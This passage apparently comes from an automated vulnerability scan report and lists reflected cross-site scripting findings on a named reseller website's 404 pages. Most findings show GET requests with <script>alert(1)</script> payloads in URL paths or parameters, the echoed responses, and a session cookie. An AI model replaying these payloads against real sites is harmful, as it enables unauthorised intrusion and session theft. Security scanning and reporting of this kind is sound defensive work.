User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:35:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/themes/kosmos/images/ratinga3e9d<script>alert(1)</script>933f21d39c6/4half.gif was not found on this server.</p>
...[SNIP]...

2.2684. http://www.resellerbase.com/detail/39/themes/kosmos/images/rating/4half.gif [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/39/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload d380c<script>alert(1)</script>abcd9a090a6 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39/themes/kosmos/images/rating/4half.gifd380c<script>alert(1)</script>abcd9a090a6 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:35:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/themes/kosmos/images/rating/4half.gifd380c<script>alert(1)</script>abcd9a090a6 was not found on this server.</p>
...[SNIP]...

2.2685. http://www.resellerbase.com/detail/39/themes/kosmos/images/rating/4half.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/39/themes/kosmos/images/rating/4half.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d3cf1<script>alert(1)</script>fdb058b6ec2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39/themes/kosmos/images/rating/4half.gif?d3cf1<script>alert(1)</script>fdb058b6ec2=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:33:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/themes/kosmos/images/rating/4half.gif?d3cf1<script>alert(1)</script>fdb058b6ec2=1 was not found on this server.</p>
...[SNIP]...

2.2686. http://www.resellerbase.com/detail/39/themes/kosmos/images/rating/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/39/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f8d1f<script>alert(1)</script>8971c5b1a4c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailf8d1f<script>alert(1)</script>8971c5b1a4c/39/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailf8d1f<script>alert(1)</script>8971c5b1a4c/39/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2687. http://www.resellerbase.com/detail/39/themes/kosmos/images/rating/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/39/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4b5fd<script>alert(1)</script>d98778ea083 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/394b5fd<script>alert(1)</script>d98778ea083/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/394b5fd<script>alert(1)</script>d98778ea083/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2688. http://www.resellerbase.com/detail/39/themes/kosmos/images/rating/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/39/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8ae4b<script>alert(1)</script>8154cfc848c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39/themes8ae4b<script>alert(1)</script>8154cfc848c/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/themes8ae4b<script>alert(1)</script>8154cfc848c/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2689. http://www.resellerbase.com/detail/39/themes/kosmos/images/rating/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/39/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload dde3d<script>alert(1)</script>a2e2514537c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39/themes/kosmosdde3d<script>alert(1)</script>a2e2514537c/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/themes/kosmosdde3d<script>alert(1)</script>a2e2514537c/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2690. http://www.resellerbase.com/detail/39/themes/kosmos/images/rating/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/39/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 25431<script>alert(1)</script>355fc1152f8 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39/themes/kosmos/images25431<script>alert(1)</script>355fc1152f8/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/themes/kosmos/images25431<script>alert(1)</script>355fc1152f8/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2691. http://www.resellerbase.com/detail/39/themes/kosmos/images/rating/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/39/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload c5f5d<script>alert(1)</script>ace72427308 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39/themes/kosmos/images/ratingc5f5d<script>alert(1)</script>ace72427308/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/themes/kosmos/images/ratingc5f5d<script>alert(1)</script>ace72427308/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2692. http://www.resellerbase.com/detail/39/themes/kosmos/images/rating/search.php [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/39/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 41c94<script>alert(1)</script>210d7eda8be was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39/themes/kosmos/images/rating/search.php41c94<script>alert(1)</script>210d7eda8be?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/themes/kosmos/images/rating/search.php41c94<script>alert(1)</script>210d7eda8be?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2693. http://www.resellerbase.com/detail/39/themes/kosmos/images/rating/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/39/themes/kosmos/images/rating/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload bd8b5<a>3abbc7142c6 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/39/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Searchbd8b5<a>3abbc7142c6&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Searchbd8b5<a>3abbc7142c6&opt=2 was not found on this server.</p>
...[SNIP]...

2.2694. http://www.resellerbase.com/detail/39/themes/kosmos/images/rating/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/39/themes/kosmos/images/rating/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 95cc7<a>24cd80fed7d was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/39/themes/kosmos/images/rating/search.php?keyword=search...95cc7<a>24cd80fed7d&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/themes/kosmos/images/rating/search.php?keyword=search...95cc7<a>24cd80fed7d&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2695. http://www.resellerbase.com/detail/39/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/39/themes/kosmos/images/rating/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 76f2b<script>alert(1)</script>9b9358eeaf9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&76f2b<script>alert(1)</script>9b9358eeaf9=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&76f2b<script>alert(1)</script>9b9358eeaf9=1 was not found on this server.</p>
...[SNIP]...

2.2696. http://www.resellerbase.com/detail/39/themes/kosmos/images/rating/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/39/themes/kosmos/images/rating/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload a3801<a>93bb5b9b50e was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/39/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2a3801<a>93bb5b9b50e HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2a3801<a>93bb5b9b50e was not found on this server.</p>
...[SNIP]...

2.2697. http://www.resellerbase.com/detail/39/themes/kosmos/images/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/39/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 95944<script>alert(1)</script>16b629e8a9c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail95944<script>alert(1)</script>16b629e8a9c/39/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail95944<script>alert(1)</script>16b629e8a9c/39/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2698. http://www.resellerbase.com/detail/39/themes/kosmos/images/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/39/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9499d<script>alert(1)</script>660d596c67f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/399499d<script>alert(1)</script>660d596c67f/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/399499d<script>alert(1)</script>660d596c67f/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2699. http://www.resellerbase.com/detail/39/themes/kosmos/images/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/39/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 14aeb<script>alert(1)</script>5368a52ef70 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39/themes14aeb<script>alert(1)</script>5368a52ef70/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/themes14aeb<script>alert(1)</script>5368a52ef70/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2700. http://www.resellerbase.com/detail/39/themes/kosmos/images/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/39/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload eb4b1<script>alert(1)</script>014900b49ca was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39/themes/kosmoseb4b1<script>alert(1)</script>014900b49ca/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/themes/kosmoseb4b1<script>alert(1)</script>014900b49ca/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2701. http://www.resellerbase.com/detail/39/themes/kosmos/images/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/39/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload df053<script>alert(1)</script>6c8aaf55634 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

